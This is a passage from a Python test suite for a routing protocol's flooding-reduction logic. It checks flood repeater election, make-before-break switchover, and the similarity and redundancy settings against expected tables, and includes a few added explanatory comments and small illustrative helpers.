check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs)
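#
# (Added note, not in the original test file.) In the topology above every
# grandparent is reachable through exactly one parent, so no parent can be
# pruned without losing coverage: the election must keep all eight interfaces
# as flood repeaters, which is exactly what the expected tables assert.
#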
def test_graceful_switchover():
#
# Initial topology (same as test_8x8_partial_connectivity_partial_redundant_coverage)
#
packet_common.add_missing_methods_to_thrift()
parents = {
# pylint:disable=bad-whitespace
11: [21, 23, 26, 28],
12: [ 22, 24, 27 ],
13: [21 ],
14: [ 22, ],
15: [ 24, 27 ],
16: [ 23, 26, 27 ],
17: [ 22, 24, 26 ],
18: [21, 24, 25, 27 ]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 1: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 1 | 2: 1-1 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 2 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 4 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 1 | 1 | False |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
test_node = check_flood_repeater_election(parents, expected_parents, expected_grandparents,
expected_intfs)
#
# LIEs with the you-are-flood-repeater field set to true are sent over interfaces 11 and 15. They
# should not be pending anymore, but the others still should be.
#
for intf_name in ["intf11", "intf15"]:
intf = test_node.interfaces_by_name[intf_name]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Run the flood repeater election algorithm again. Nothing should change.
#
test_node.floodred_elect_repeaters()
assert test_node.floodred_parents_table().to_string() == expected_parents
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# LIEs with the you-are-flood-repeater field set to true are sent over all remaining pending
# interfaces.
#
for intf_name in ["intf12", "intf16", "intf17", "intf18"]:
intf = test_node.interfaces_by_name[intf_name]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Run the flood repeater election algorithm again. Nothing should change.
#
test_node.floodred_elect_repeaters()
assert test_node.floodred_parents_table().to_string() == expected_parents
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Create new links between parents and grandparents, and re-run flood repeater election
#
# pylint:disable=bad-whitespace
parents[11] = [21, 22, 23, 24, 26, 27, 28]
parents[13] = [21, 22, 23, 25, 26, 28]
parents[14] = [21, 22, 24, 25, 26, 28]
update_test_node(test_node, parents)
test_node.floodred_elect_repeaters()
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 6 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 7 | 1: 7-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 3 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 3 | 2: 4-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 4 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 2 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 3 | 2: 4-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
assert test_node.floodred_parents_table().to_string() == expected_parents
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 4 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 5 | 4 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 3 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
assert test_node.floodred_grandparents_table().to_string() == expected_grandparents
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Two of the parents (13 and 14) have just been elected to become new flood repeaters, but they
# are pending because we have not yet sent a LIE to them. Four of the parents (15, 16, 17, and
# 18) are no longer flood repeaters, but they are waiting for the new flood repeaters to be
# informed before they step down.
#
# Send a LIE to parent 14. The old flood repeaters will still not yet step down, since 13 still
# needs to be informed.
#
intf = test_node.interfaces_by_name["intf14"]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+-----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
#
# Send a LIE to parent 13. The old flood repeaters will finally step down since all new flood
# repeaters have been informed.
#
intf = test_node.interfaces_by_name["intf13"]
intf.floodred_mark_sent_you_are_fr()
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
assert test_node.floodred_interfaces_table().to_string() == expected_intfs
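#
# (Illustrative sketch, not part of the original test suite.) The graceful
# switchover exercised above follows a make-before-break rule: interfaces that
# lost the election keep acting as flood repeaters until every newly elected
# interface has been sent its you-are-flood-repeater LIE. A minimal standalone
# model of that rule, with hypothetical names:
#
def _old_repeaters_may_step_down(interfaces):
    # interfaces: iterable of (newly_elected, informed) boolean pairs, one per
    # parent interface. Stepping down is allowed only once every newly elected
    # interface has been informed.
    return all(informed for newly_elected, informed in interfaces if newly_elected)
# Example: with one elected interface not yet informed, nobody steps down.
# _old_repeaters_may_step_down([(True, True), (True, False)])  -> False
# _old_repeaters_may_step_down([(True, True), (True, True)])   -> True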
def test_similarity():
packet_common.add_missing_methods_to_thrift()
#
# Default similarity is 2
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Similarity[| ]*2 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Configure similarity 1
#
additional_node_config = {"flooding_reduction_similarity": 1}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Similarity[| ]*1 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-7 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 2: 6-5 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 3: 4-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 4: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 3 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
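#
# (Illustrative sketch, assuming the grouping rule implied by the tables
# above.) Parents are sorted by grandparent count, descending; a similarity
# group runs from its first member's count down to that count minus the
# configured similarity. With similarity 1, counts 8 and 7 share group
# "1: 8-7" while 6 starts group 2; with the default similarity 2, counts 8
# down to 6 would share one group.
#
def _similarity_groups(grandparent_counts, similarity):
    groups = []
    for count in sorted(grandparent_counts, reverse=True):
        if groups and groups[-1][0] - count <= similarity:
            groups[-1].append(count)
        else:
            groups.append([count])
    return groups
# _similarity_groups([5, 5, 6, 8, 4, 2, 7, 7], 1) -> [[8, 7, 7], [6, 5, 5], [4], [2]]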
def test_redundancy():
packet_common.add_missing_methods_to_thrift()
#
# Default redundancy is 2
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Redundancy[| ]*2 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Configure redundancy 1
#
additional_node_config = {"flooding_reduction_redundancy": 1}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Redundancy[| ]*1 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
#
# Configure redundancy 6 (not all grandparents can be covered at this redundancy)
#
additional_node_config = {"flooding_reduction_redundancy": 6}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Redundancy[| ]*6 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 3 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 5 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
